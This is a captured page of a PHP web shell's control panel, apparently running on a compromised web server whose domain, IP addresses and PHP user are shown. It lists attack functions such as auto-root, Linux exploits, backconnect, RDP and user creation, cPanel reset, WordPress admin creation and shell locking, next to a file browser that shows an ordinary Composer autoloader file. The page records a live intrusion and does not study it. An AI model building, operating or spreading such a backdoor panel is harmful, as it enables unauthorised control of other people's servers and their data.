Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 162.158.159.135
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
noahresources.com /
source /
vendor /
composer /
[ HOME SHELL ]
Name
Size
Permission
Action
class-map-generator
[ DIR ]
drwxr-xr-x
pcre
[ DIR ]
drwxr-xr-x
semver
[ DIR ]
drwxr-xr-x
ClassLoader.php
15.69
KB
-rw-r--r--
InstalledVersions.php
14.72
KB
-rw-r--r--
LICENSE
1.04
KB
-rw-r--r--
autoload_classmap.php
820.73
KB
-rw-r--r--
autoload_files.php
3.28
KB
-rw-r--r--
autoload_namespaces.php
288
B
-rw-r--r--
autoload_psr4.php
7.89
KB
-rw-r--r--
autoload_real.php
1.65
KB
-rw-r--r--
autoload_static.php
900.38
KB
-rw-r--r--
installed.json
352.18
KB
-rw-r--r--
installed.php
55.34
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : autoload_real.php
<?php // autoload_real.php @generated by Composer class ComposerAutoloaderInit2def14f220e23b5ac9ba56e759f4dd7c { private static $loader; public static function loadClassLoader($class) { if ('Composer\Autoload\ClassLoader' === $class) { require __DIR__ . '/ClassLoader.php'; } } /** * @return \Composer\Autoload\ClassLoader */ public static function getLoader() { if (null !== self::$loader) { return self::$loader; } spl_autoload_register(array('ComposerAutoloaderInit2def14f220e23b5ac9ba56e759f4dd7c', 'loadClassLoader'), true, true); self::$loader = $loader = new \Composer\Autoload\ClassLoader(\dirname(__DIR__)); spl_autoload_unregister(array('ComposerAutoloaderInit2def14f220e23b5ac9ba56e759f4dd7c', 'loadClassLoader')); require __DIR__ . '/autoload_static.php'; call_user_func(\Composer\Autoload\ComposerStaticInit2def14f220e23b5ac9ba56e759f4dd7c::getInitializer($loader)); $loader->register(true); $includeFiles = \Composer\Autoload\ComposerStaticInit2def14f220e23b5ac9ba56e759f4dd7c::$files; foreach ($includeFiles as $fileIdentifier => $file) { composerRequire2def14f220e23b5ac9ba56e759f4dd7c($fileIdentifier, $file); } return $loader; } } /** * @param string $fileIdentifier * @param string $file * @return void */ function composerRequire2def14f220e23b5ac9ba56e759f4dd7c($fileIdentifier, $file) { if (empty($GLOBALS['__composer_autoload_files'][$fileIdentifier])) { $GLOBALS['__composer_autoload_files'][$fileIdentifier] = true; require $file; } }
Close